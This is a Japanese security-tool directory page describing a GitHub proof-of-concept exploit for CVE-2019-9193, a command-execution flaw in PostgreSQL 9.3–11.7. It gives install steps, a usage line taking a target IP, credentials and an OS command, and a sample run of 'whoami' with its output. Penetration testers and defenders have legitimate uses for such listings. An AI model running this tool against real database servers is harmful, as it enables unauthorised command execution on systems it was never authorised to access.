Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-9193 — は、特定のバージョンのPostgreSQL(9.3~11.7)における認証済みのリモートコード実行(RCE)脆弱性を悪用するために設計されたPoCツールです。 | Kitploit
ツール/GitHubGitHub/geniuszly/cve-2019-9193
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育データベースセキュリティ
GitHubgeniuszly/cve-2019-9193

CVE-2019-9193

は、特定のバージョンのPostgreSQL(9.3~11.7)における認証済みのリモートコード実行(RCE)脆弱性を悪用するために設計されたPoCツールです。

リポジトリを見る
411年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

GenPostgresRCEExploit

GenPostgresRCEExploit は、特定の PostgreSQL バージョン(9.3~11.7)における認証済みリモートコード実行(RCE)脆弱性を悪用するための PoC ツールです。CVE-2019-9193 に脆弱な PostgreSQL データベースサーバー上で、認証済みユーザーがシステムコマンドを実行できるようにします。

機能

  • RCE の悪用: 認証済み PostgreSQL セッションを通じてシステムコマンドを実行します。
  • バージョンチェック: 対象の PostgreSQL サーバーのバージョンを検証し、脆弱性の有無を確認します。
  • コマンド実行: サーバーが脆弱な場合、カスタムコマンドの実行を許可します。
  • 自動テーブル管理: 手動操作なしで、コマンド実行用の一時テーブルを作成・削除します。

必要条件

  • Python 3.x
  • PostgreSQL クライアントライブラリ(psycopg2 パッケージ)

インストール

  1. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. 必要なパッケージをインストールします:
    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <ターゲットIP> -p <ポート> -d <データベース名> -U <ユーザー名> -P <パスワード> -c "<システムコマンド>"

オプション

  • -i, --ip: PostgreSQL サーバーの IP アドレス(デフォルト: 127.0.0.1)
  • -p, --port: PostgreSQL サーバーのポート(デフォルト: 5432)
  • -d, --database: PostgreSQL データベース名(デフォルト: template1)
  • -U, --user: PostgreSQL サーバーに接続するユーザー名(デフォルト: postgres)
  • -P, --password: PostgreSQL サーバーに接続するパスワード(デフォルト: postgres)
  • -c, --command: サーバー上で実行するシステムコマンド
  • -t, --timeout: 接続タイムアウト(秒)(デフォルト: 10)

例

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

この例では、192.168.1.10 の PostgreSQL サーバーに接続し、指定された認証情報で認証を行い、whoami コマンドを実行します。

出力例

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена

postgres

免責事項

このツールは教育目的および倫理的なテストのみを目的としています。システムに対する不正使用は違法であり、固く禁止されています。作者は誤用による一切の責任を負いません。

ツールをダウンロード